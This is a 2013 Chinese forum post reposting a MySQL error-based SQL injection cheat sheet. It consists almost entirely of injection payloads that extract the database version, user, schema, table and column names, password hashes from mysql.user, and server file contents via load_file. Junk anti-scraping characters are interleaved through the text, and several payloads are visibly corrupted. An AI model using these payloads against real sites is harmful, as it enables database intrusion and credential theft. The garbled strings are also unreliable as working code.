本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
! i* E% y8 [7 p; [% K
8 W' Y8 U% ~; c+ x' w1 u" S- D
' V6 N9 I: _% h4 R2 |8 bMysql暴错注入参考(pdf),每天一贴。。。+ ^# G3 U+ q+ y P
5 O h: N( h( i$ ~$ N
MySql Error Based Injection Reference
4 `! u) t+ w8 }) L; P7 L+ E! s: n[Mysql暴错注入参考]
, Z2 v# P- |, f5 ~! YAuthornig0s1992
/ ~4 C1 }( n l. i3 H- UBlog:http://pnig0s1992.blog.51cto.com/) B; ]' Y! u- p$ V
TeAm:http://www.FreeBuf.com/* v2 @# R; |# d
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功) S, e( E3 L. i
小部分版本使用name_const()时会报错.可以用给出的Method.2测试+ m- [8 ?5 m3 N0 P4 M6 ^+ ~
查询版本:
7 @7 o& ^6 J+ GMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
; T& {+ i% @, z$ h h! Ajoin+(select+name_const(@@version,0))b)c)
& U* B" L+ I3 s5 r4 o$ g9 CMethod.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro. h, D! A* E. o" _
up by a)b), @, q$ R7 V3 X/ ~
查询当前用户:) b. L$ ?) k9 e3 Z1 C
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
& [/ U9 W: ]0 J6 O5 n5 b' OMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
7 j3 a% ?; [- R; j5 B, Dand(0)*2))x+from+information_schema.tables+group+by+x)a)- z) H8 m% d9 M/ U8 Y* d3 \
查询当前数据库: R. `* E8 ^5 t7 P) ?8 w
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)* T; r# m% z t/ h3 M' @ Z
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo% D7 Z8 T$ T! O8 L1 V$ D
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a), @% a4 ?4 V0 M
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
0 x8 L+ \. P: ]/ q5 D3 DLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
2 m" h/ T' ?6 ]) X顺序替换
, z, I+ t3 X+ ~" ], B爆指定库数目:2 n" N3 L) `8 o) p0 Z7 f
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t5 N# e; P0 {1 [+ R2 f# i
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
1 }( [& u: O! c5 N! r" p+by+x)a)+and+1=1 0x6D7973716C=mysql9 Z; W: U% q8 e6 i
依次爆表:8 |7 I H* @% b O2 F$ ]0 C3 _
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
9 M% Y1 p# p |7 N# b' M4 Y: w& yable_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta. Q4 H! b) `' ?1 v. s
bles+group+by+x)a)+and+1=1
' W1 g$ {$ K& E0x6D7973716C=Mysql 将n顺序替换
) J+ q: O& @* \) G3 g) \爆表内字段数目:
. _' l* e9 H9 s( z- nand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
?% b+ @! P z7 g d s5 p) k$ ]+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran3 |. b" T% O( W9 b
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1. r/ A; h/ I- q8 U
依次爆字段:
, x3 c/ b, q! u0 B& q$ [3 R0 F A4 }and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
7 r4 T7 m) E3 ^6 ?, g2 K0 J+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
+ _2 ]" F! f O) w: Z( Hloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 将n顺序替换) P, J: z2 w5 R0 O
依次暴内容:: ]- y* P+ M; U/ [/ z
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
7 f5 X9 K: M& o0 g6 Cma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
! M) O$ f' ^: h. P' }/ a/ _- J将n顺序替换
# w1 I5 a! j, r$ M' D5 B: \爆文件内容:
. l: x+ d) U0 D4 I* q0 r: q- Yand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
1 `( M, a3 U0 |8 Z A2 [from+information_schema.tables+group+by+a)b) : K1 V* K' h/ Z& B- m
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
F4 u9 }4 p: n# P1 J6 O% d( UThx for reading.
, y& [ j' V# h/ b4 A0 V( M8 b3 I7 |1 }! Z
不要下载也可以, ) E% x; ?/ G) ~- \' t; V$ H9 k7 @6 L3 }
|